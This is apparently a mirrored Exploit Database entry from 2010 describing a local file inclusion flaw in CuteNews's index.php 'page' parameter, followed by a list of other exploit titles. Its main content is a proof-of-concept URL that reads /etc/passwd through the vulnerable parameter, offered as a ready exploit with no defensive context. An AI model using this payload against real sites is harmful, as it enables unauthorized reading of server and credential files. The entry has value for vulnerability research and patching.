CuteNews – ‘page’ Local File Inclusion

Exploit Database
44 阅读

作者： eidelweiss

日期： 2010-10-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15208/

==========================================================
	CuteNews (page) local File Inclusion Vulnerability
==========================================================
vendor: http://cutephp.com/
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com

==========================================================

vuln: index.php?page=

lfi: /etc/passwd

exploit : index.php?page= [lfi]

	-=[p0c]=-
	
	http://127.0.0.1/index.php?page= [lfi]
			or
	http://127.0.0.1/path/index.php?page=/etc/passwdt

=========================| -=[ E0F ]=- |============================

last Exploits
CuteNews – ‘page’ Local File Inclusion的更多信息

Alienvault OSSIM/USM 5.3.1 – SQL Injection：
OpenCart 2.1.0.2 < 2.2.0.0 - json_decode Function Remote Code Execution：
Mailhog 1.0.1 – Stored Cross-Site Scripting (XSS)：
Credit Lite 1.5.4 – SQL Injection：
runt-communications Design – ‘property_more.php’ SQL Injection：
Pimcore CMS 2.3.0/3.0 – SQL Injection：
Free Realty 3.1-0.6 – Multiple Vulnerabilities：
Rumble Mail Server 0.51.3135 – ‘servername’ Stored XSS：